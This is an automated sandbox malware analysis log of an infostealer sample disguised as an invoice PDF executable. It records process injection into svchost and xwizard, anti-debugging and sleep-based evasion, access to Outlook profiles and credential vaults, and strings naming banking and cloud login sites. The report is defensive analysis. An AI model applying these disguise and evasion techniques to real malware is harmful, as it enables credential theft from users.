                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Windows\SysWOW64\xwizard.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fQbMdgFgKkVEm.exe, 00000004.00000000.2274863523.000000000042E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2039615159.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2039806550.0000000004070000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2260658057.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2353547525.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2353547525.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2258852027.0000000003300000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000003.2355523208.0000000004D14000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503032997.000000000505E000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000005.00000003.2353468444.0000000004B61000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503032997.0000000004EC0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2039615159.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2039806550.0000000004070000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2260658057.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2353547525.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2353547525.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2258852027.0000000003300000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, xwizard.exe, 00000005.00000003.2355523208.0000000004D14000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503032997.000000000505E000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000005.00000003.2353468444.0000000004B61000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503032997.0000000004EC0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: xwizard.pdb source: svchost.exe, 00000002.00000002.2353401714.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321941028.000000000302B000.00000004.00000020.00020000.00000000.sdmp, fQbMdgFgKkVEm.exe, 00000004.00000003.2423482550.0000000000B40000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.000000000405C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4501845196.0000000003216000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.00000000054EC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2636924020.000000002FB8C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.000000000405C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4501845196.0000000003216000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.00000000054EC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2636924020.000000002FB8C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: xwizard.pdbGCTL source: svchost.exe, 00000002.00000002.2353401714.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321941028.000000000302B000.00000004.00000020.00020000.00000000.sdmp, fQbMdgFgKkVEm.exe, 00000004.00000003.2423482550.0000000000B40000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Static PE information: real checksum: 0xa2135 should be: 0xf442e
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004772DE
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004440780_2_00444078
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeAPI/Special instruction interceptor: Address: 2E55294
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\xwizard.exeWindow / User API: threadDelayed 9641Jump to behavior
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-86029
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-84938
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeAPI coverage: 3.3 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\xwizard.exeAPI coverage: 2.8 %
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe TID: 7752Thread sleep time: -55000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe TID: 7752Thread sleep count: 31 > 30Jump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe TID: 7752Thread sleep time: -46500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe TID: 7752Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe TID: 7752Thread sleep time: -33000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exe TID: 7720Thread sleep count: 331 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exe TID: 7720Thread sleep time: -662000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exe TID: 7720Thread sleep count: 9641 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exe TID: 7720Thread sleep time: -19282000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_0301C840 FindFirstFileW,FindNextFileW,FindClose,5_2_0301C840
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
                Source: 293v7V-J3.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 293v7V-J3.5.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 293v7V-J3.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 293v7V-J3.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 293v7V-J3.5.drBinary or memory string: global block list test formVMware20,11696428655
                Source: 293v7V-J3.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 293v7V-J3.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 293v7V-J3.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 293v7V-J3.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 293v7V-J3.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 293v7V-J3.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 293v7V-J3.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 293v7V-J3.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 293v7V-J3.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 293v7V-J3.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4502211397.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4501845196.0000000003216000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2638568966.000001B36FA0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 293v7V-J3.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 293v7V-J3.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 293v7V-J3.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 293v7V-J3.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 293v7V-J3.5.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 293v7V-J3.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: 293v7V-J3.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 293v7V-J3.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 293v7V-J3.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 293v7V-J3.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 293v7V-J3.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 293v7V-J3.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 293v7V-J3.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 293v7V-J3.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 293v7V-J3.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 293v7V-J3.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeAPI call chain: ExitProcess graph end nodegraph_0-84830
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417DD3 LdrLoadDll,2_2_00417DD3
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0045A259 BlockInput,0_2_0045A259
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_02E55560 mov eax, dword ptr fs:[00000030h]0_2_02E55560
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_02E55500 mov eax, dword ptr fs:[00000030h]0_2_02E55500
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_02E53EC0 mov eax, dword ptr fs:[00000030h]0_2_02E53EC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h]2_2_0375C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732050 mov eax, dword ptr fs:[00000030h]2_2_03732050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h]2_2_037B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]2_2_037C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]2_2_0372A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]2_2_0372C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]2_2_037B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]2_2_0372C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]2_2_037720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0372A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]2_2_037380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]2_2_037B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]2_2_037B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]2_2_037C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]2_2_0373208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]2_2_03738770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]2_2_03730750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]2_2_037BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]2_2_037B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]2_2_037AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]2_2_03730710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]2_2_03760710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]2_2_0376C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]2_2_037BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]2_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]2_2_037B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]2_2_037307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E47A0 mov eax, dword ptr fs:[00000030h]2_2_037E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]2_2_037D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]2_2_03762674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]2_2_0374C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]2_2_0374E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]2_2_03766620
